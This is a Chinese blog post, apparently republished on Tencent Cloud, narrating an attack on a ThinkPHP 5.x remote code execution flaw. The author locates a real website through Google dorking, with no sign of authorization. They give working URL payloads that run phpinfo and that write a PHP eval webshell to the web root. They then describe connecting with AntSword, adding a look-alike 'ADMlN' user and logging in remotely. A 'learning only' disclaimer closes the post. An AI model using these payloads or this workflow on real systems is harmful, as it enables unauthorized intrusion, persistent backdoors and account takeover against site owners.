Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >漏洞复现 | Thinkphp5.x远程代码执行漏洞了解一哈

漏洞复现 | Thinkphp5.x远程代码执行漏洞了解一哈

作者头像
TeamsSix
发布于 2019-09-24 10:14:57
发布于 2019-09-24 10:14:57
1.4K00
代码可运行
举报
运行总次数:0
代码可运行

0、序

晚上闲来无事,复习不想复习,看书看不进去,打开电脑也不知道要干啥,索性就找个漏洞玩吧,下午正好注册了一个在线靶场环境,其中有个Think PHP5.0吸引了我,因为在12月9号这个漏洞爆出来的时候当时一度尝试复现这个漏洞都没有成功,最后就不了了之,so 那就打开看看吧。

说实话,这个界面是真的好看,而且流畅度也很不错,比某亚的要好的太多,尽管如此,做着做着也就没啥意思了,那为什么不去网上找找呢,权当练练手,而且之前一直没有成功,那就让我们先找到存在漏洞的目标。

1、Google Hacking

利用Google Hacking很轻松便可以找到一些使用ThinkPHP框架的网站,但并不是每个都存在这个远程命令执行的漏洞,在找寻验证了一番后终于找到了一个,哈哈。

2、POC验证

对目标执行下面POC如果出现phpinfo页面便可以说明存在漏洞了,不过还需要根据目标情况来判断使用哪个POC,反正多尝试几个,下面的POC是我尝试成功的一个。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

3、写入木马

确定存在漏洞后便可以对其写入一句话啦,下面的POC可以在目标系统网站根目录下写入内容为<?php eval($_POST[test]);?>的test.php文件,接着就可以直接用蚁剑连接了,尝试了好几个一句话,这个是成功的一个。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test.php&vars[1][]=<?php eval($_POST[test]);?>

4、对目标进行添加管理员账号

连上虚拟终端后,便可以对其新建管理员用户了,不过感觉蚁剑是真的慢,好在能连上,试了一下菜刀,连都连不上。下面添加了一个ADMlN用户,不过貌似提升为管理员用户的命令没有成功被执行。

5、远程登陆

利用自己创建的用户名对其远程登陆,就像下面这样:

OK,连接成功

6、总结:

整体过程中碰到最大的问题就是蚁剑有点不给力,总觉着有时它会掉线,这次渗透测试也是给自己练练手,也可以说是碰巧找到一个比较弱的系统,然后才比较顺利,最后也是提醒各位网站管理员,一定要检查一下自己的网站是不是存在含有漏洞的组件。


严禁将本文内容用于犯罪目的,本文仅用作学习目的,另外由于本人水平有限,文中出现问题在所难免,还请各位看官见谅。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-03-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 TeamsSix 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
ThinkPHP 5.x 远程命令执行漏洞利用(GetShell)
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。
HACK学习
2019/08/06
4.3K0
ThinkPHP 5.x 远程命令执行漏洞利用(GetShell)
Thinkphp5 远程代码执行漏洞事件分析报告
2018年12月10日,ThinkPHP 官方发布《ThinkPHP 5.* 版本安全更新》,修复了一个远程代码执行漏洞。由于 ThinkPHP 框架对控制器名没有进行足够的检测,导致攻击者可能可以实现远程代码执行。
Seebug漏洞平台
2018/12/29
1.8K0
Thinkphp5 5.0.22 / 5.1.29远程执行代码漏洞复现
2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。
渗透攻击红队
2019/11/20
2.6K0
Thinkphp5 5.0.22 / 5.1.29远程执行代码漏洞复现
实战渗透,轻松拿shell五步走
文章源自【字节脉搏社区】-字节脉搏实验室 作者-whit 1.起因 我有一个朋友,让我帮忙测试一下他的站,于是有了这篇文章。(无中生友篇) 2.信息收集 访问首页一下先,看到是thinkphp v5
字节脉搏实验室
2020/03/08
1.5K0
实战渗透,轻松拿shell五步走
ThinkPHP框架漏洞解析
由于ThinkPHP v5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接进行远程的代码执行,进而获得服务器权限。
红队蓝军
2024/08/13
1910
ThinkPHP框架漏洞解析
利用Metasploit 打入ThinkPHP内网...
(1)通过msfconsole命令启动Metasploit在这个过程中,系统会主动加载数据库,如图2所示:
Ms08067安全实验室
2020/07/06
1.3K0
vulhub之thinkphp系列漏洞复现
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
网络安全自修室
2024/03/01
4370
vulhub之thinkphp系列漏洞复现
ThinkPHP 5.x.x RCE 总结
ThinkPHP 5.x [路由控制不严谨] RCE 影响范围 ThinkPHP 5.0-5.0.23 ThinkPHP 5.1-5.1.31 Payload ?s=index/think\reque
Mirror王宇阳
2021/06/22
1.6K0
ThinkPHP 5.x 远程代码执行漏洞
ThinkPHP是PHP语言的一种开源框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,ThinkPHP框架本身没有什么特别模块要求,具体的应用系统运行环境要求视开发所涉及的模块。 由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由的情况下可以执行任意方法,从而导致远程命令执行漏洞。受影响的版本包括 5.0 和 5.1 版本(即默认情况下)。
Andromeda
2023/10/21
4110
ThinkPHP 5.x 远程代码执行漏洞
一次简单的内网渗透靶场实战
这里可以看到几个主要的端口,例如80、135、139、445,这里首先就可以想到可以利用的点有ipc、smb
红队蓝军
2022/05/17
8210
一次简单的内网渗透靶场实战
ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell)
Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f
逍遥子大表哥
2021/12/17
1.4K0
ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell)
网站漏洞修复对于网站清除木马的解决办法
THINKPHP漏洞修复,官方于近日,对现有的thinkphp5.0到5.1所有版本进行了升级,以及补丁更新,这次更新主要是进行了一些漏洞修复,最严重的就是之前存在的SQL注入漏洞,以及远程代码执行查询系统的漏洞都进行了修复,官方本以为没有问题了,但是在实际的安全检测当中发现,还是存在问题,还是可以远程代码进行注入,插入非法字符,提交到服务器后端中去。
技术分享达人
2018/12/12
1.1K0
一次简单的内网渗透靶场实战
在内网渗透的过程中思路才是最重要的,本次内网渗透的主机虽然不多,主要还是锻炼自己内网渗透的一个思想。
红队蓝军
2022/04/13
8210
一次简单的内网渗透靶场实战
ThinkPHP5.0 漏洞测试
由于对控制器名没有明确的检测,在没有开启强制路由的情况下,直接就可以执行phpinfo(),如果服务器未限制shell等函数的执行,便可以直接执行shell提权
WindRunnerMax
2020/08/27
1.2K0
ThinkPHP5.0 漏洞测试
vulntarget-e
这里外网win2016靶机有开防火墙,所以需要加个-d参数绕过防火墙进行端口扫描,但是这里扫的时候出了点问题,不过多试几次也能扫出来开放了5985端口(WinRM服务)和49773端口
MssnHarvey
2022/12/13
8500
vulntarget-e
thinkphp5 RCE分析及复现
tp5最近爆了个rce,最先看到是在斗鱼src公众号上发的分析文章,这么大的洞,到了第二天那些什么安全网站连个预警都没有,估计tp5的站都被撸穿了。
Deen_
2018/12/14
4.9K0
thinkphp5 RCE分析及复现
攻防世界刷题笔记 - wuuconix's blog
最近博客好久没更新了。CTFHUB web基础部分刷完很久了,提高部分的题目太难了,而且量也少。看了一眼阮行止学长提供的刷题顺序。打算开始做攻防世界。攻防世界在很久以前刚接触CTF的时候做了一些题目。当时每道题几乎都是看的wp,基础知识太薄弱了。现在做应该会好些。
wuuconix
2023/03/16
4900
攻防世界刷题笔记 - wuuconix's blog
命令执行与代码执行漏洞原理
命令执行定义 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。
天钧
2020/03/12
2.5K0
Nmap NSE初探-thinkphp远程代码执行脚本分享
根据分组的名字可以分辨出其对应的功能,比较常用的就是这个 vuln了,这个是漏洞检测分组 调用方法 nmap www.baidu.com -p80 --script=vuln 需要注意的是,同一个脚本可能存在于多个分组,比如一个脚本可能既属于vuln,又属于exploit
意大利的猫
2020/08/20
8000
实战 | 记一次非法站点的艰难渗透
https://github.com/mulcl/S_mucn/blob/main/RCE/Thinkphp5_RCE.md
F12sec
2022/09/29
1K0
实战 | 记一次非法站点的艰难渗透
相关推荐
ThinkPHP 5.x 远程命令执行漏洞利用(GetShell)
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验